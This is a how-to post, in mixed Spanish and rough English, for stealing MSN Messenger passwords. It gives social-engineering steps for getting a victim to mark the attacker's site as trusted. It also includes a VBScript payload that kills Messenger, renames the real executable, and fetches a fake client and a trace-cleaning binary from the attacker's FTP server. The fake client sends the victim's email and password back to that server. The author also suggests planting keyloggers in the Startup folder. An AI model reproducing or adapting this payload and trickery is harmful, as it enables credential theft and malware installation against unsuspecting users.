How to get your password out of MSN Messenger (own and works)
Si estáis hasta las pelotas de bajaros programas que no funcionan o malditos troyanos que los detectan los antivirus de los “PC clientes”… habéis encontrado lo que buscábais, una forma de sacar la contraseña de la forma más limpia que puede haber, y lo que es más importante, que ellos no se enteren. La forma de lograrlo es algo compleja pero sencilla a su vez, es como todo, algo macarronico o casero, pero funciona, se resume en varias partes. Lo he logrado con un programa de Visual Basic hecho por mí, usando web y ftp. Por cierto si eres un poco listo te darás cuenta que con la primera parte de este documento podrías meterle cualquier fichero en su disco y en el path que quieras, for example in “C:Documents and SettingsAll UsersMenú InicioProgramasInicio” es cosa de usar la cabeza y ahi meterle un keylogger, un archivo que borre cosas… (Having bad ideas is not my thing) ;}
Requirements:
– Web server.
– FTP Server.
The thing is that the user connects to a website and without realizing it, a fake Messenger gets downloaded (Without doing anything else but visiting the website). When they go to use their MSN, A fake one pops up, Which is identical to the real one, The fool enters the password and MSN gives an error: “You can't sign in right now, blah, blah…”, And when clicking any button (Retry, Cancel, Upon closing..) The real MSN opens and connects; The end user doesn't realize that their credentials have been sent to an FTP server (With their email + contraseña) While all this is happening. In the end, no trace is left on the infected PC.
Steps we must take ourselves (As little hackers):
First, We place this website somewhere on our web server (It doesn't have to be our web server, It can be Terra's…), It is this ejemplo.html. Si usamos de servidor IIS pues lo dejamos en C:inetpubwwwroot o si es un apache pues en /var/www/html/xxxx, si es otro servidor pues donde sea.
Second, en un servidor ftp colocamos estos dos ficheros msnmsgr.exe (código fuente en VB – HERE) and tmp.exe (código fuente en VB – HERE) en el raiz del ftp.
Third, una vez que el usuario ya haya metido la gamba y se haya conectado a nuestra web, se haya bajado el messenger malo y se haya intentado conectar en nuestro FTP aparecerá un fichero con su loginname de Windows seguido de la extensión “.msn”, si lo abrís con el notepad veréis algo como:
|
user msn
messenger put c:manolito.msn Quit Saw*****@*****il.com contraseñadelpanoli |
Pasos que debe hacer el usuario final (demostración):
Lo único raro (sospechoso) que debe hacer el usuario es meter como Sitios de confianza a nuestro sitio web, pero eso es facil de engañarle, decirle que es por ejemplo la web de la cuadrilla para verla o que tiene que ser así por narices…

Si abre la web le dará un error abajo, entonces se le dice que para que funcione que la meta en “Sitios de confianza”, en este caso yo le he dicho que abra “HTTP://www.bujarra.com/ejemplo.html” pero cada uno que se ponga su html donde le de la gana.

GOOD, esto se lo explicáis o se lo hacéis vosotros, que vaya a “Tools” > “Opciones de Internet…”

A la pestaña de “Safety” y al botón de “Sites…”

Debe desmarcar el check de abajo (1) y arriba en (2) debe meter el nombre de la web vuestra y darle a “Add” y a Aceptar todas las pantallas.

Entonces le saldra esto, le decis que es ‘normal’ y que le de a “Yes”, un amigo me dice… “es que el usuario no es tonto”, y a lo que se debe de responder… “not stupid, very stupid”.

GOOD, once it automatically enters the website, the following would happen to it:
– The “msnmsgr.exe” original is renamed to “msnmsgr.old”.
– A file called is automatically copied from the FTP “msnmsgr.exe”.
– One called is also copied from the FTP “tmp.exe”
Then, when the user opens their MSN (and if they already have it open, don’t worry because it will be closed with a kill so I can rename the .exe to .tmp) the following happens:

When opening MSN Messenger for the first time, this one opens, which is as similar as possible to the Fake MSN, and the user, as usual, will click the button “Sign In” or to “File” > “Sign in…”

It will ask for the email and password, and if normally it doesn’t ask, this time it will (screw them), doesn’t it seem almost real?? hehe, by clicking “Accept” the following error will appear:

And here, whatever he clicks on will close and send the username and password to the FTP we have specified, and afterwards (half a second) this fake MSN will close and the new one will open,

As you can see, the little icon down there is already moving as always…

And if we connect to our FTP, we will see that there is a .msn file with the user's Windows login, and if we edit it with Notepad we will see their email and password.
Simply amazing.
PS: It goes without saying that everyone should modify in the HTML/Visual Basic code what the FTP server is, with which username, with which password… If you do it with the executables from this procedure, the only thing you will achieve is putting them on my FTP, which I don't care about, y podréis verlos usando el mismo usuario/contraseña (msn/messenger).
Que hay que modificar, explicación algo + técnica AKI abajo:
GOOD, una vez visto cómo funciona si quieres usarlo tú, debes usar Visual Basic 6.0 para editar el código fuente que te viene en la web anterior. Aquí se explica que parametros tienes que modificar para que te funcione con tu sitio web y con tu sitio ftp (incluyendo usuario y contraseña).
Modificación HTML on the web ejemplo.html,
Primero pones otro nombre al HTML, no le llames ejemplo y metes yo que se, unas fotos, algo para engañarle al usuario final. Este sería el script que viene, lo editas con el Bloc de notas por ejemplo y modifica only los valores en rojo:
| … <script language=”VBScript” type=”text/VBScript”> Option Explicit Dim objShell Set objShell = CreateObject(“WScript.Shell”) objShell.Run “%comspec% /c tskill msnmsgr” ,0 <– Este comando de MSDOS mata (si es que lo tiene activo) el MSN Messenger. objShell.Run “%comspec% /c copy ” & chr(34) & “C:Archivos de programaMSN Messengermsnmsgr.exe” & chr(34) & ” ” & chr(34) & “C:Archivos de programaMSN Messengermsnmsgr.old” & chr(34), 0 <– Este renombra el ejecutable del MSN objShell.Run “%comspec% /c echo user msn> c:ftp.txt”, 0 <– Crea en C: un fichero temporal para luego ejecutarse y subir esos datos por FTP, en esta linea se mete el usuario del FTP, MODIFICALO. objShell.Run “%comspec% /c echo messenger>> c:ftp.txt”, 0 <– Ahora mete el password del FTP en el fichero temporal. objShell.Run “%comspec% /c echo get tmp.exe ” & chr(34) & “C:Archivos de programaMSN Messengertmp.exe” & chr(34) & “>> c:ftp.txt”, 0 <– Obtiene el tmp.exe que este lo que hace es limpiar el PC de la victima de ‘pruebas’. objShell.Run “%comspec% /c echo get msnmsgr.exe ” & chr(34) & “C:Archivos de programaMSN Messengermsnmsgr.exe” & chr(34) & “>> c:ftp.txt”, 0 <– Con este comando de MSDOS se obtiene el MSN maligggno, hehe. objShell.Run “%comspec% /c echo quit>> c:ftp.txt”, 0 <– Con el QUIT finalizamos la sesion del FTP. objShell.Run “%comspec% /c ftp -n -s:C:ftp.txt www.bujarra.com“, 0 <– Now you just have to execute the command to connect to the FTP, it will do it when you open the website.WScript.Quit </script> … |
GOOD, now what's left are the VBasic modifications, Modifies only the words in rojo and then remember Compile and upload it to the FTP:
|
Form2 of msnhhh.vbp Private Sub cmdAceptar_Click() |
Remember that the source codes of these files are HERE: msnmsgr.exe and tmp.exe








































